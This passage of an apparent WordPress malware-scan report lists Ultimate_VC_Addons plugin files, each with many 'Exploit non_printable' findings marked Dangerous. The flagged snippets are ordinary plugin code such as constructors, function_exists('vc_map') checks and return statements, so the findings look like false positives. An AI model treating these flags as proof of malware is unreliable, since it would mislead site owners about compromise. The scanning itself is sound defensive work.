<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_VC_Addons_Info_Banner</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">assets</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_info_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Init</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 523</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 823</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_437").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_team.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 62.64 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 18</span><br><table id="file_438" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">init_team</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Team'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ultimate_vc' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ult_team'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'vc_icon_team'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #DD0000">'content_element' </span><span style="color: #007700">=> </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #DD0000">'controls' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'full'</span><span style="color: #007700">, </span><span style="color: #DD0000">'catego</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Team Module Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Team Module module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_team_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'team_member_name_font'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_team_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'team_member_position_font'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_team_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'team_member_description_font'</span><span style="color: #007700">] ) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Team Module Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_team_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Team Module Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 581</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Team Module Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_team</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_team_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_438").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_interactive_banners.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 29.32 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_439" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Interactive_Banners' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$aio_interactive_banners </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Interactive_Banners</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Interactive_Banner' </span><span style="color: #007700">) )</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate_Info_Table</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">Interactive Banner assets</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ib_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_439").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_expandable_section.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 44.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_440" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } public function </span><span style="color: #0000BB">ultimate_ultimate_exp_section</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Expandable Section' </span><span style="color: #007700">), </span><span style="color: #DD0000">'base' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'ultimate_exp_section'</span><span style="color: #007700">, </span><span style="color: #DD0000">'icon' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'uvc_expandable'</span><span style="color: #007700">, </span><span style="color: #DD0000">'class' </span><span style="color: #007700">=> </span><span style="color: #DD0000">'uvc_expandable'</span><span style="color: #007700">, </span><span style="color: #DD0000">'as_parent' </span><span style="color: #007700">=></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Expandable Section Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Expandable section Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Expandable Section module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">expandable admin script </span><span style="color: #007700">and </span><span style="color: #0000BB">styles</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_exp_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ultimate_exp_section</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
